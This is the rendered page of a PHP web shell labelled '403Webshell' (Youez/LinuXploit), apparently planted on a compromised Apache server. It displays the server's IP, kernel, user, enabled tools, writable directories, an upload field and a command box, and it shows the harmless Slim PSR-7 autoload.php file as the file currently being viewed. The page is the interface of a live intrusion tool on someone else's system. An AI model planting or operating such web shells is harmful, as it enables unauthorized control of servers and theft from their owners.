403Webshell
Server IP : 15.235.198.142  /  Your IP : 216.73.216.41
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ballsack 6.8.0-45-generic #45-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 30 12:02:04 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/share/php/Slim/Psr7/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/php/Slim/Psr7/autoload.php
<?php

// Require
require_once 'Fig/HttpMessageUtil/autoload.php';
require_once 'Psr/Http/Message/autoload.php';
require_once 'Psr/Http/Message/factory-autoload.php';
require_once 'Symfony/Polyfill/Php80/autoload.php';
require_once 'getallheaders/getallheaders.php';

// Suggest

// @codingStandardsIgnoreFile
// @codeCoverageIgnoreStart
// this is an autogenerated file - do not edit
spl_autoload_register(
    function($class) {
        static $classes = null;
        if ($classes === null) {
            $classes = array(
                'slim\\psr7\\cookies' => '/Cookies.php',
                'slim\\psr7\\environment' => '/Environment.php',
                'slim\\psr7\\factory\\requestfactory' => '/Factory/RequestFactory.php',
                'slim\\psr7\\factory\\responsefactory' => '/Factory/ResponseFactory.php',
                'slim\\psr7\\factory\\serverrequestfactory' => '/Factory/ServerRequestFactory.php',
                'slim\\psr7\\factory\\streamfactory' => '/Factory/StreamFactory.php',
                'slim\\psr7\\factory\\uploadedfilefactory' => '/Factory/UploadedFileFactory.php',
                'slim\\psr7\\factory\\urifactory' => '/Factory/UriFactory.php',
                'slim\\psr7\\header' => '/Header.php',
                'slim\\psr7\\headers' => '/Headers.php',
                'slim\\psr7\\interfaces\\headersinterface' => '/Interfaces/HeadersInterface.php',
                'slim\\psr7\\message' => '/Message.php',
                'slim\\psr7\\nonbufferedbody' => '/NonBufferedBody.php',
                'slim\\psr7\\request' => '/Request.php',
                'slim\\psr7\\response' => '/Response.php',
                'slim\\psr7\\stream' => '/Stream.php',
                'slim\\psr7\\uploadedfile' => '/UploadedFile.php',
                'slim\\psr7\\uri' => '/Uri.php'
            );
        }
        $cn = strtolower($class);
        if (isset($classes[$cn])) {
            require __DIR__ . $classes[$cn];
        }
    },
    true,
    false
);
// @codeCoverageIgnoreEnd

// Files

Youez - 2016 - github.com/yon3zu
LinuXploit